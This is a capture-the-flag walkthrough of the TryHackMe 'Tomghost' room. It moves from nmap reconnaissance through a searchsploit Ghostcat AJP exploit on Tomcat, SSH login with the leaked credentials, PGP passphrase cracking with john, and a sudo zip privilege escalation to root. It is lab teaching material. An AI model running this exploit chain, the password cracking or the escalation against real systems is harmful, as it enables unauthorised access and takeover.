Tomghost

Reconnaissance

Initial nmap scan to find open ports , using the flag "treat all hosts as alive" (-Pn)

nmap -Pn 10.10.193.3

Detailed Nmap Scan :

Command Breakdown:

  • (-sV): Service version

  • (-sC): Default nmap scripts

  • (-p): Specifying ports 22,53,8009,8080

  • (-oN nmap): Saving it into a files called nmap

nmap -sV -sC -p 22,53,8009,8080 -oN nmap 10.10.193.3

Enumeration

Lets visit the webserver on port 8080.

Its an Apache Tomcat/9.0.30 service page, we can't find anything interesting on this page.

Lets look at the service running on port 8009 which is ajp13, a binary protocol that allows to reverse proxying requests from a Web Server to a Application Server. Lets look for exploits on this service.

searchsploit ajp

The second exploit in this list is just what we are working for, so lets read the exploit and look at how to use it, to do this we need to copy the exploit to our directory.

searchsploit -m multiple/webapps/48143.py

Exploitation

Looking at the exploit, it just looks like we need to run the exploit against the IP of the target machine.

python 48143.py 10.10.193.3

And we found credentials, we can use these to login through ssh.

ssh skyfuck@10.10.193.3

We can read the user file which can be found with this command

find / -type f -name user.txt 2>/dev/null

Privilege Escalation

Looking in the current directory we are in there are two files.

One is credential.pgp which is a encrypted pgp (Pretty good privacy) file. The other is tryhackme.asc which is a ASCII armour file.

First we need to import the asc file and then decrypt the credential.pgp file.

gpg --import tryhackme.asc
gpg --decrypt credential.pgp 

It looks like we need a password so lets first copy this file to our machine and then crack the password using Johntheripper.

scp skyfuck@10.10.193.3:/home/skyfuck/tryhackme.asc .

Next we need to find the hash using gpg2john and then crack it using john.

gpg2john tryhackme.asc > hash
john hash --wordlist=/usr/share/wordlists/rockyou.txt

After cracking it you get the password alexandru

Now you can decrypt the pgp file.

gpg --decrypt credential.pgp

We found credentials to another user, lets switch users to merlin.

su merlin

Lets run sudo -l to see what we can run as root.

sudo -l

Looks like we can run /usr/bin/zip so lets go to GTFOBins and look for the commands to privilege escalate to root.

Once we run these commands we get root.

TF=$(mktemp -u)
sudo zip $TF /etc/hosts -T -TT 'sh #'
sudo rm $TF

We are now root and now we can read root.txt and answer the last question of this room.

Last updated